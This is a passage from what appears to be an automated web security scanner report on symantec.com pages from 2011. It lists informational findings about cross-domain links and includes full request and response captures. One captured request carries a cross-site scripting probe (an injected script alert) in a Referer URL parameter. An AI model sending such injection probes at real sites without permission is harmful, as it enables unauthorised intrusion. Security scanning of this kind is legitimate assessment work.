<span><a href="http://www.symantec.com/about/index.jsp" title="About"> About</a>...[SNIP]... <span><a href="http://www.symantec.com/sitemap/index.jsp" title="Site Map"> Site Map</a>...[SNIP]... <span id="item2" class="footerItemBorder"><a href="http://www.symantec.com/about/profile/policies/legal.jsp" onmouseover="showdiv(2)" onmouseout="hidediv(2)" title="Legal"> Legal</a>...[SNIP]... <span><a href="http://www.symantec.com/about/profile/privacypolicy/index.jsp" title="Privacy"> Privacy</a>...[SNIP]... 
<span id="item4" class="footerItemBorder"><a href="http://www.symantec.com/feedback/contactus.jsp" onmouseover="showdiv(4)" onmouseout="hidediv(4)" title="Contact"> Contact</a>...[SNIP]... <span><a href="http://www.symantec.com/rss/index.jsp" title="RSS"> RSS</a>...[SNIP]...
14.56. http://www.symantec.com/business/products/categories.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/products/categories.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/business/products/categories.jsp?pcid=pcat_infrastruct_op
The response contains the following links to other domains:
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/products/categories.jsp?pcid=pcat_infrastruct_op HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; bizProdScrollVertical=0; IS3_GSV=DPL-0_TES-1315621927_PCT-1315622275_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@26@s/6036/5742/5736/5417&e/11; s_sq=%5B%5BB%5D%5D; s_pers=%20s_nr%3D1315622485105-New%7C1336358485105%3B%20event69%3Devent69%7C1336358485107%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520purchasing%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fcategories.jsp%2525253Fpcid%2525253Dpcat_infrastruct_op%252526ot%25253DA%2526symantecstoresmb%252C%2520veritasnonconsumer%252C%2520symanteccom%253D%252526pid%25253Den%25252Fus%2525253ASMBStore%2525253ALRC%2525253AChat%25252520Form%252526pidt%25253D1%252526oid%25253Dmailto%2525253Asales%252540symantecsmbrenewals.com%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 77466 Cache-Control: public, max-age=3563 Date: Fri, 09 Sep 2011 21:41:00 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>Security, Backup & Archiving, Server Management, and Storage Software | Symantec Enterprise Products</title> <m...[SNIP]... <div class="promoProdOneCol4Lft"> <a href="http://www.verisign.com/ssl/ssl-information-center/increase-traffic-conversion/index.html?tid=sym_bus_prod_lp"> <img src="/content/en/us/enterprise/images/promo/b-verisign-promo.jpg" alt="Trust the Leader, VeriSign SSL Certificates, Buy Now" title="Trust the Leader, VeriSign SSL Certificates, Buy Now" class=" ...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... 
<li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... 
<li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.57. http://www.symantec.com/business/products/purchasing.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/products/purchasing.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1
The response contains the following links to other domains:
http://free.pctools.com/free-antivirus/
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
Request
GET /business/products/purchasing.jsp?pcid=pcat_info_risk_comp&pvid=fds_1 HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps6ed59%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E0e8182bf4be User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621927_PCT-1315621927_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; s_sq=%5B%5BB%5D%5D; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/9; bizProdScrollVertical=0; s_pers=%20s_nr%3D1315622085200-New%7C1336358085200%3B%20event69%3Devent69%7C1336358085202%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%252Cveritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fbusiness%2525252Fproducts%2525252Fpurchasing.jsp%2525253Fpcid%2525253Dpcat_info_risk_comp%25252526pvid%2525253Dfds_1%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 52358 Cache-Control: public, max-age=3599 Date: Fri, 09 Sep 2011 21:34:23 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>VeriSign Identity Protection Fraud Detection Service: Purchasing Options - S...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... <li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... 
<li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... 
<li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.58. http://www.symantec.com/business/theme.jsp
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/theme.jsp
Issue detail
The page was loaded from a URL containing a query string:
http://www.symantec.com/business/theme.jsp?themeid=contact-verisign
The response contains the following links to other domains:
http://free.pctools.com/free-antivirus/
http://twitter.com/VeriSignAuth
http://us.norton.com/
http://us.norton.com/antivirus/
http://us.norton.com/ghost/
http://us.norton.com/internet-security/
http://us.norton.com/nortonlive/free-pc-checkup.jsp
http://us.norton.com/nortonlive/spyware-virus-removal.jsp
http://us.norton.com/security_response/malware.jsp
http://us.norton.com/security_response/phishing.jsp
http://us.norton.com/security_response/spyware.jsp
http://www.backup.com/
http://www.facebook.com/VeriSignAuthentication
http://www.pctools.com/file-recover/
http://www.pctools.com/password-manager/
http://www.pctools.com/performance-toolkit/
http://www.pctools.com/privacy-guardian/
http://www.pctools.com/registry-mechanic/
http://www.pctools.com/simple-backup/
http://www.pctools.com/spyware-doctor-antivirus/
http://www.pctools.com/spyware-doctor/
http://www.thawte.com/
http://www.verisign.ch/
http://www.verisign.co.jp/
http://www.verisign.co.uk/
http://www.verisign.com.au/
http://www.verisign.com.br/
http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html
http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html
http://www.verisign.com/authentication/two-factor-authentication/index.html
http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html
http://www.verisign.com/code-signing/index.html
http://www.verisign.com/code-signing/index.html?tid=sym_a_box
http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box
http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box
http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box
http://www.verisign.com/ssl/free-trial/index.html
http://www.verisign.com/ssl/index.html
http://www.verisign.com/ssl/seal/index.html
http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html
http://www.verisign.com/ssl/ssl-information-center/index.html
http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html
http://www.verisign.com/support/contact/index.html
http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html
http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html
http://www.verisign.com/trust-seal/index.html
http://www.verisign.com/trust-seal/resources/malware-faq/index.html
http://www.verisign.in/
http://www.verisignchina.com.cn/
http://www.youtube.com/verisignauth
https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063
https://idprotect.verisign.com/wheretouse.v
https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box
https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box
https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002
https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000
https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020
Request
GET /business/theme.jsp?themeid=contact-verisign HTTP/1.1 Host: www.symantec.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/verisign-worldwide/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: s_pers=%20s_nr%3D1315621569527-New%7C1336357569527%3B%20event69%3Devent69%7C1336357569528%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%20s_sv_sid%3D806960442771%3B; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/2; s_sv_112_s1=1@16@a//1315621570007; s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]
Response
HTTP/1.1 200 OK Server: Sun-Java-System-Web-Server/7.0 Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Content-Length: 51820 Cache-Control: public, max-age=1145 Date: Fri, 09 Sep 2011 21:26:48 GMT Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head> <title>VeriSign Authentication Services, now a part of Symantec - SSL Certificates, Extended Validation SSL, User Authenti...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w45290160530800000" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w62590256709788020" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w13490307590800002" target="_blank"> Submit inquiry online</a>...[SNIP]... <br /> <a href="https://forms.verisign.com/websurveys/servlet/ActionMultiplexer?Action_ID=ACT2000&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063" target="_blank"> Submit an inquiry online</a>...[SNIP]... </strong> If you purchased your VIP Credential from a VIP Member Site, contact the VIP Member Site for assistance. For a list of all member sites, <a href="https://idprotect.verisign.com/wheretouse.v" target="_blank"> click here</a>...[SNIP]... <strong><a href="http://www.verisign.ch/" target="_blank"> Europe Headquarters</a>...[SNIP]... <strong><a href="http://www.verisign.in/" target="_blank"> India</a>...[SNIP]... <strong><a href="http://www.verisign.com.au/" target="_blank"> Australia Headquarters</a>...[SNIP]... <strong><a href="http://www.verisign.co.jp/" target="_blank"> Japan Headquarters </a>...[SNIP]... <strong><a href="http://www.verisign.ch/" target="_blank"> Switzerland</a>...[SNIP]... 
<strong><a href="http://www.thawte.com/"> Africa</a>...[SNIP]... <strong><a href="http://www.verisign.co.uk/"> United Kingdom</a>...[SNIP]... <strong><a href="http://www.verisign.com.br/" target="_blank"> Brazil</a>...[SNIP]... <strong><a href="http://www.verisignchina.com.cn/" target="_blank"> China</a>...[SNIP]... </h4> <a href="http://www.verisign.com/support/contact/index.html" target="_blank"> VeriSign Support Contacts</a>...[SNIP]... <br /> <a href="http://www.verisign.com/support/code-signing-support/code-signing-misuse/index.html" target="_blank"> Report Code Signing Misuse</a><br /> <a href="http://www.verisign.com/support/ssl-certificates-support/secure-site-seal/abuse.html" target="_blank"> Report VeriSign Seal Abuse</a><br /> <a href="http://www.verisign.com/support/ssl-certificates-support/extended-validation-certificate-complaint/index.html" target="_blank"> Report EV Certificate Complaint</a>...[SNIP]... f you have questions regarding the VeriSign Secured.. Seal or VeriSign Trust Seal, including how to obtain one for use on your site or how it is being used on a site you have visited, please visit our <a href="http://www.verisign.com/ssl/seal/index.html" target="_blank"> seal information page</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy SSL Certificates" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/buy-ssl-certificates/index.html?tid=sym_a_box" title="Buy SSL Certificates" target="_blank"> SSL Certificates</a>...[SNIP]... 
<div style="float:left; width:50px; margin-right:8px"> <a href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy VeriSign Trust Seal" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/trust_initial?application_locale=VTC_US&tid=sym_a_box" title="Buy VeriSign Trust Seal" target="_blank"> VeriSign Trust Seal</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-buy-btn.gif" width="50" height="15" alt="Buy Code Signing Certificates" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/code-signing/index.html?tid=sym_a_box" title="Buy Code Signing" target="_blank"> Code Signing</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/free-trial/index.html" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-try-btn.gif" width="50" height="15" alt="Free VeriSign Trials" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/free-trial/index.html" title="Free Trials" target="_blank"> Free Trials</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-renew-btn.gif" width="50" height="15" alt="Renew SSL Certificates" />...[SNIP]... 
<div> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/ssl/current-ssl-customers/renew-ssl/index.html?tid=sym_a_box" title="Renew SSL Certificates" target="_blank"> SSL Certificates</a>...[SNIP]... <div style="float:left; width:50px; margin-right:8px"> <a href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-signin-btn.gif" width="50" height="15" alt="Sign In to My Account" />...[SNIP]... <div> <a style="font-family:arial; font-size:11px" href="https://trust-center.verisign.com/process/retail/console_login?application_locale=VRSN_US&tid=sym_a_box" title="Sign In to My Account" target="_blank"> My Account</a>...[SNIP]... <div style="float:left; width:90px; margin-right:5px"> <a href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" target="_blank"> <img src="/content/en/us/enterprise/images/theme/b-thm-verisign-logo.gif" width="90" height="49" alt="Get a VeriSign Seal" />...[SNIP]... <div style="padding-top:5px"> <a style="font-family:arial; font-size:11px" href="http://www.verisign.com/get-verisign-seal/index.html?tid=sym_a_box" title="Get a VeriSign Seal" target="_blank"> Get a VeriSign Seal</a>...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://twitter.com/VeriSignAuth" target="_blank"> <div style="float: left;">...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://www.facebook.com/VeriSignAuthentication" target="_blank"> <div style="float: left;">...[SNIP]... <div style="padding-bottom: 5px;"><a href="http://www.youtube.com/verisignauth" target="_blank"> <div style="float: left;">...[SNIP]... <li><a href="http://us.norton.com/antivirus/" title="AntiVirus"> AntiVirus</a>...[SNIP]... <li><a href="http://us.norton.com/ghost/" title="Backup Software"> Backup Software</a>...[SNIP]... 
<li><a href="http://us.norton.com/internet-security/" title="Internet Security"> Internet Security</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/malware.jsp" title="Malware"> Malware</a>...[SNIP]... <li><a href="http://www.backup.com/" title="Online Backup"> Online Backup</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/phishing.jsp" title="Phishing"> Phishing</a>...[SNIP]... <li><a href="http://us.norton.com/security_response/spyware.jsp" title="Spyware"> Spyware</a>...[SNIP]... <li><a href="http://us.norton.com/" title="Virus Protection"> Virus Protection</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/spyware-virus-removal.jsp" title="Virus Removal"> Virus Removal</a>...[SNIP]... <li><a href="http://us.norton.com/nortonlive/free-pc-checkup.jsp" title="Virus Scan"> Virus Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/index.html" title="SSL"> SSL</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/index.html" title="SSL Certificates"> SSL Certificates</a>...[SNIP]... <li><a href="http://www.verisign.com/ssl/ssl-information-center/extended-validation-ssl-certificates/index.html" title="Extended Validation"> Extended Validation</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/index.html" title="VeriSign Trust Seal"> VeriSign Trust Seal</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/index.html" title="Two-Factor Authentication"> Two-Factor Authentication</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/two-factor-authentication/vip-authentication/index.html" title="Identity Protection"> Identity Protection</a>...[SNIP]... <li><a href="http://www.verisign.com/trust-seal/resources/malware-faq/index.html" title="Malware Scan"> Malware Scan</a>...[SNIP]... <li><a href="http://www.verisign.com/code-signing/index.html" title="Code Signing"> Code Signing</a>...[SNIP]... 
<li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/index.html" title="Public Key Infrastructure"> Public Key Infrastructure</a>...[SNIP]... <li><a href="http://www.verisign.com/authentication/pki-infrastructure-solutions/managed-pki/index.html" title="PKI"> PKI</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor-antivirus/" title="Spyware Doctor with Antivirus"> Spyware Doctor with Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/performance-toolkit/" title="Performance Toolkit"> Performance Toolkit</a>...[SNIP]... <li><a href="http://www.pctools.com/simple-backup/" title="Simple Backup"> Simple Backup</a>...[SNIP]... <li><a href="http://www.pctools.com/file-recover/" title="File Recovery"> File Recovery</a>...[SNIP]... <li><a href="http://www.pctools.com/spyware-doctor/" title="Spyware Doctor"> Spyware Doctor</a>...[SNIP]... <li><a href="http://www.pctools.com/privacy-guardian/" title="Privacy Guardian"> Privacy Guardian</a>...[SNIP]... <li><a href="http://free.pctools.com/free-antivirus/" title="Free Antivirus"> Free Antivirus</a>...[SNIP]... <li><a href="http://www.pctools.com/password-manager/" title="Password Manager"> Password Manager</a>...[SNIP]... <li><a href="http://www.pctools.com/registry-mechanic/" title="Registry Mechanic"> Registry Mechanic</a>...[SNIP]...
14.59. http://www.symantec.com/business/verisign/fraud-detection-service
Summary
Severity: Information
Confidence: Certain
Host: http://www.symantec.com
Path: /business/verisign/fraud-detection-service
Issue detail
